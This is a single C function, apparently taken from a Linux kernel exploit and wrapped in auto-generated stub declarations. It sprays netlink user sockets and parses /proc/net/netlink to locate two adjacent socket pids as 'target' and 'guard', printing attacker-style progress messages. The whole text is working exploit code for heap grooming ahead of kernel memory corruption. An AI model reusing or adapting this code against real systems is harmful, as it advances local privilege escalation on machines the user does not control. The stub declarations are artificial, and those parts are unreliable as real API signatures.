
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sock_pid {int sock_fd; int pid; } ;


 int MAX_SOCK_PID_SPRAY ;
 int NETLINK_USERSOCK ;
 int close (int) ;
 scalar_t__ create_netlink_candidate (struct sock_pid*) ;
 int free (int*) ;
 scalar_t__ parse_proc_net_netlink (int**,size_t*,int ) ;
 int printf (char*,...) ;

__attribute__((used)) static int find_netlink_candidates(struct sock_pid *target, struct sock_pid *guard)
{
  struct sock_pid candidates[MAX_SOCK_PID_SPRAY];
  int *pids = ((void*)0);
  size_t nb_pids;
  int i, j;
  int nb_owned;
  int ret = -1;

  target->sock_fd = -1;
  guard->sock_fd = -1;


  for (i = 0; i < MAX_SOCK_PID_SPRAY; ++i)
  {
    if (create_netlink_candidate(&candidates[i]))
    {
      printf("[-] failed to create a new candidate\n");
      goto release_candidates;
    }
  }
  printf("[+] %d candidates created\n", MAX_SOCK_PID_SPRAY);

  if (parse_proc_net_netlink(&pids, &nb_pids, NETLINK_USERSOCK))
  {
    printf("[-] failed to parse '/proc/net/netlink'\n");
    goto release_pids;
  }
  printf("[+] parsing '/proc/net/netlink' complete\n");


  i = nb_pids;
  while (--i > 0)
  {
    guard->pid = pids[i];
    target->pid = pids[i - 1];
    nb_owned = 0;


    for (j = 0; j < MAX_SOCK_PID_SPRAY; ++j)
    {
      if (candidates[j].pid == guard->pid)
      {
        guard->sock_fd = candidates[j].sock_fd;
        nb_owned++;
      }
      else if (candidates[j].pid == target->pid)
      {
        target->sock_fd = candidates[j].sock_fd;
        nb_owned++;
      }

      if (nb_owned == 2)
        goto found;
    }


    guard->sock_fd = -1;
    target->sock_fd = -1;
  }


  goto release_pids;

found:
  printf("[+] adjacent candidates found!\n");
  ret = 0;

release_pids:
  i = MAX_SOCK_PID_SPRAY;
  if (pids != ((void*)0))
    free(pids);

release_candidates:
  while (--i >= 0)
  {

    if ((candidates[i].sock_fd != target->sock_fd) &&
        (candidates[i].sock_fd != guard->sock_fd))
    {
      close(candidates[i].sock_fd);
    }
  }

  return ret;
}
